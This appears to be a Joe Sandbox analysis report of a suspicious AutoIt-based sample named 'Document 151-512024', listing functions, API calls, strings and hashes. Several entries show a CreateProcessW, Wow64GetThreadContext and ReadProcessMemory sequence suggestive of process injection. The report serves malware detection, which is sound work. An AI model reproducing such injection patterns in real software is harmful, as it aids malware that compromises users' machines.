RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00943B0F,SwapMouseButtons,00000004,?), ref: 00943B83

Strings

Control Panel\Mouse, xrefs: 00943B3E

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: a901bd5cfd2070ea6d7657c4e5c7ae12960c096bec3606b93c99d9dcb2c33420
Instruction ID: 3254d213018419a0781fa5b1556dee47bb644efadd04bc1e62a705c8eeb5aa0a
Opcode Fuzzy Hash: a901bd5cfd2070ea6d7657c4e5c7ae12960c096bec3606b93c99d9dcb2c33420
Instruction Fuzzy Hash: 9E112AB5521209FFDF218FA5DC44EBEB7BCEF05744B10895AA805D7110E2319E44AB60

Function 01BC1300 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01BC1ABB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01BC1B51
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01BC1B73

Memory Dump Source

Source File: 00000000.00000002.1226007560.0000000001BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bc0000_Document 151-512024.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction ID: 201181e1958b38c0643d63f34c30641b95760a75d96a062f86439ef5c3f7b621
Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction Fuzzy Hash: AB620A30A14258DBEB24CFA8C850BDEB776EF58700F1091A9D20DEB391E7759E81CB59

Function 0094DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 009932B7

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 9100b3555a3696651c5da9ef958a004958911f55f4d30998059a5ff2201acbd9
Instruction ID: fe34520ad54dfa1e142a41952097de0a59ae85ea8e986b78c8ca7175c759601a
Opcode Fuzzy Hash: 9100b3555a3696651c5da9ef958a004958911f55f4d30998059a5ff2201acbd9
Instruction Fuzzy Hash: D8C28675A00205CFCB24CFA8C891FADB7B5BF48310F248569E956AB3A1E375ED41CB91

Function 0095FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00960668

Part of subcall function 009632A4: RaiseException.KERNEL32(?,?,?,0096068A,?,00A11444,?,?,?,?,?,?,0096068A,00941129,00A08738,00941129), ref: 00963304

__CxxThrowException@8.LIBVCRUNTIME ref: 00960685

Strings

Unknown exception, xrefs: 00960692

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 267e4350ab804a237bcbcb6ed3a68dc2c970ed5a269a8841312068d6fbfe0363
Instruction ID: 64017aa44e974b4c7cbadbd8b5878a4784b9bbd8692d3f88795941ce54a278d9
Opcode Fuzzy Hash: 267e4350ab804a237bcbcb6ed3a68dc2c970ed5a269a8841312068d6fbfe0363
Instruction Fuzzy Hash: 44F0C23490030D77CB00FAA5ECA6E9E777C6EC0350B608932B924965D1EF71DA69C681

Function 009B3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 009B302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 009B3044

Strings

aut, xrefs: 009B3038

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 1cf401d1bd974c498a151254bbbeab1b5b2a4f0bc8f8cef6a9ef4ce9e4d3cd83
Instruction ID: 666c648808f7b04b69be16bdfdd89517639863fdc38fb98af0090eb045518035
Opcode Fuzzy Hash: 1cf401d1bd974c498a151254bbbeab1b5b2a4f0bc8f8cef6a9ef4ce9e4d3cd83
Instruction Fuzzy Hash: EBD05BB154531877DA20A794AC0DFC73B6CD704750F000652B755D30D5DAB0D584CAD0

Function 009C7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 009C82F5
TerminateProcess.KERNEL32(00000000), ref: 009C82FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 009C84DD

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 48a04c9740869c7bcfba951db35df14ebfe44820b313c353bcca9aae2d339bf0
Instruction ID: 61aa8eda9523a939c656726d76c566197bf11f93bd2e171602981b6132e1ce8a
Opcode Fuzzy Hash: 48a04c9740869c7bcfba951db35df14ebfe44820b313c353bcca9aae2d339bf0
Instruction Fuzzy Hash: A9125971A083419FC724DF28C484F6ABBE5BF89318F04895DE8998B352DB35E945CB92

Function 00975AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b12c8fb9225f886661e40f5ef627bd23462f4b7b7bd656a813e7846380e196f
Instruction ID: f407dc6782a936a7ba054c2d43b5e19fd6917fa1f76c9a0a9a5b84cee0d54723
Opcode Fuzzy Hash: 1b12c8fb9225f886661e40f5ef627bd23462f4b7b7bd656a813e7846380e196f
Instruction Fuzzy Hash: 6B51E472D006099FCB51EFA8C846FFE7BB8EF45310F1A8459F409A7291D7B59901CB61

Function 009410F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00941BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00941BF4
Part of subcall function 00941BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00941BFC
Part of subcall function 00941BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00941C07
Part of subcall function 00941BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00941C12
Part of subcall function 00941BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00941C1A
Part of subcall function 00941BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00941C22

Part of subcall function 00941B4A: RegisterWindowMessageW.USER32(00000004,?,009412C4), ref: 00941BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0094136A
OleInitialize.OLE32 ref: 00941388
CloseHandle.KERNEL32(00000000,00000000), ref: 009824AB

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: ccf194f99cc19b548703f6c9513b05a4a55ae797ac16340bc3a00f324bf1f3c4
Instruction ID: 5263f6cc11fb9be4e2c6000a26f41bb95555490f1d563f8310891dcdc914af0c
Opcode Fuzzy Hash: ccf194f99cc19b548703f6c9513b05a4a55ae797ac16340bc3a00f324bf1f3c4
Instruction Fuzzy Hash: 8671ABB89123018FC784DFF9A955AD53AE6FB887A4754C22AD64AC7361EB304483CF48

Function 009454C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 0094556D
SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 0094557D

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 56b49d9855f13cc8e98bb6831e1561a394b76b993f02739aebc4483dcf02bd09
Instruction ID: a24735163683c92d5fbd7ff22fd33efe21b5315da1be049c10f04d3d9042dd5d
Opcode Fuzzy Hash: 56b49d9855f13cc8e98bb6831e1561a394b76b993f02739aebc4483dcf02bd09
Instruction Fuzzy Hash: 49315A71A00609EFDB14CF68C880FA9B7B6FB48314F158629F91997241D770FE94CB90

Function 009786AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,009785CC,?,00A08CC8,0000000C), ref: 00978704
GetLastError.KERNEL32(?,009785CC,?,00A08CC8,0000000C), ref: 0097870E
__dosmaperr.LIBCMT ref: 00978739

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: a6451f05eb1c7da85bf3c446a8881ce906b7f0257d0424f79398efccf81afffe
Instruction ID: 2ba3df635caf9ef2da63f7689796ee641c07176f0b0e2c6489fa7bd731757e9c
Opcode Fuzzy Hash: a6451f05eb1c7da85bf3c446a8881ce906b7f0257d0424f79398efccf81afffe
Instruction Fuzzy Hash: 7C012B33A8562076D6646274684EB7F674E4BC1774F3AC119F81C8B1E2DEE59C818150

Function 009B2FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,009B2CD4,?,?,?,00000004,00000001), ref: 009B2FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009B2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009B3006
CloseHandle.KERNEL32(00000000,?,009B2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009B300D

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 21e753967b50d3dfece88338890535981f62696c70573d69a196f0374515e485
Instruction ID: 6b2d4b7a35081e400ec07ab64da8c931a953a0d60f9eaeab2d1108ca8266e681
Opcode Fuzzy Hash: 21e753967b50d3dfece88338890535981f62696c70573d69a196f0374515e485
Instruction Fuzzy Hash: 24E086722D522177D6302755BC0DFCB3B1CDB86B71F104211F719751D086A0254192A8

Function 00951310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 009517F6

Strings

CALL, xrefs: 009517C6

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 8dc18d5c4cdf934ab7a3cd0510b25785832d7442be1f5f5bfdc118571a4935e3
Instruction ID: 7cde57d3fc28797fb3dd061c1ee35daf9a09433d1f56c9cbee191455530caf54
Opcode Fuzzy Hash: 8dc18d5c4cdf934ab7a3cd0510b25785832d7442be1f5f5bfdc118571a4935e3
Instruction Fuzzy Hash: 8222AC706083019FCB14DF29C491B2ABBF5BF89315F14891DF8968B3A2D775E949CB82

Function 009B6EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009B6F6B

Part of subcall function 00944ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 009B6F5A, 009B6F63

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: e376b8e7393f2014589dd0a0a160ce43086fe0f1ecbd0b4b174f6b6b0658d059
Instruction ID: 2a6e5cec7db2372fbb50299694645aabb51a28cc86aa60e3555b1d0fcf499036
Opcode Fuzzy Hash: e376b8e7393f2014589dd0a0a160ce43086fe0f1ecbd0b4b174f6b6b0658d059
Instruction Fuzzy Hash: 80B16C715082018FCB14EF64C591EAEF7E5AFD5310F04895DF8969B2A2EB30ED49CB92

Function 00942DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00982C8C

Part of subcall function 00943AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00943A97,?,?,00942E7F,?,?,?,00000000), ref: 00943AC2

Part of subcall function 00942DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00942DC4

Strings

X, xrefs: 00982C5A

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: b8d1cb25360906f76afe3589e57ae28f8cc5f462f87520cf8df88f15de995198
Instruction ID: 4b3ed3f2c5e46c0f336f80f5a553f0f4223af8794d2608a2d5634a71af26cfb7
Opcode Fuzzy Hash: b8d1cb25360906f76afe3589e57ae28f8cc5f462f87520cf8df88f15de995198
Instruction Fuzzy Hash: 99219371A102589BCF01EF94D845BEE7BFCAF89314F008059F505A7281DBB85A89CF61

Function 009B2557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 009B2587

Strings

EA06, xrefs: 009B25B9

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 00fd136b784407fcc01f0a40b7025eb4295053b2640cc517a16ca2dc95fc0d96
Instruction ID: 88084a0e8f3681a1ce0d1f3d5e8e6b814f885005f1bb8dd54fc73be35ff7bfaf
Opcode Fuzzy Hash: 00fd136b784407fcc01f0a40b7025eb4295053b2640cc517a16ca2dc95fc0d96
Instruction Fuzzy Hash: 8201B1729042687EDF28C7A8CC56FEEBBF8DB45315F00459AF192D61C1E5B8E6088B60

Function 00945745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0094949C,?,00008000), ref: 00945773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0094949C,?,00008000), ref: 00984052

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 84206a554aeb23d1445acd53ea254750d5acadad958b3c87dedc20bbf9abcccd
Instruction ID: 8bfbd0a5d9049ef99702ab3367b6e9ade85b28dc65820fa39f8ddc6c56cdcaf0
Opcode Fuzzy Hash: 84206a554aeb23d1445acd53ea254750d5acadad958b3c87dedc20bbf9abcccd
Instruction Fuzzy Hash: 92019230185225B7E3301A6ACC0EF977F98EF027B0F118311BA9C6A1E1C7B45854CB90

Function 0094B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0094BB4E

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: c4994efc57797a856c9b54d8bc8f478630cbabbf6aa11a38e375cd4df4781d37
Instruction ID: 06b351e657303a74a5992cac75d184ba6841900e76f1d6634f82ba1588abea99
Opcode Fuzzy Hash: c4994efc57797a856c9b54d8bc8f478630cbabbf6aa11a38e375cd4df4781d37
Instruction Fuzzy Hash: 6C32AA35A002099FDF24CF68C895FBEB7B9EF84314F148459E925AB261C778ED81CB91

Function 01BC12FD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01BC1ABB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01BC1B51
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01BC1B73

Memory Dump Source

Source File: 00000000.00000002.1226007560.0000000001BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bc0000_Document 151-512024.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: 97d29016b247bdb8e3a8bc42d09f234789f6ec8157ac1ab9276bb48f72e41e73
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: 1612ED24E24658C6EB24DF64D8507DEB232EF68300F1091ED910DEB7A5E77A4E81CF5A

Function 00944ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00944E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00944EDD,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944E9C
Part of subcall function 00944E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00944EAE
Part of subcall function 00944E90: FreeLibrary.KERNEL32(00000000,?,?,00944EDD,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944EC0

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944EFD

Part of subcall function 00944E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00983CDE,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944E62
Part of subcall function 00944E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00944E74
Part of subcall function 00944E59: FreeLibrary.KERNEL32(00000000,?,?,00983CDE,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944E87

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
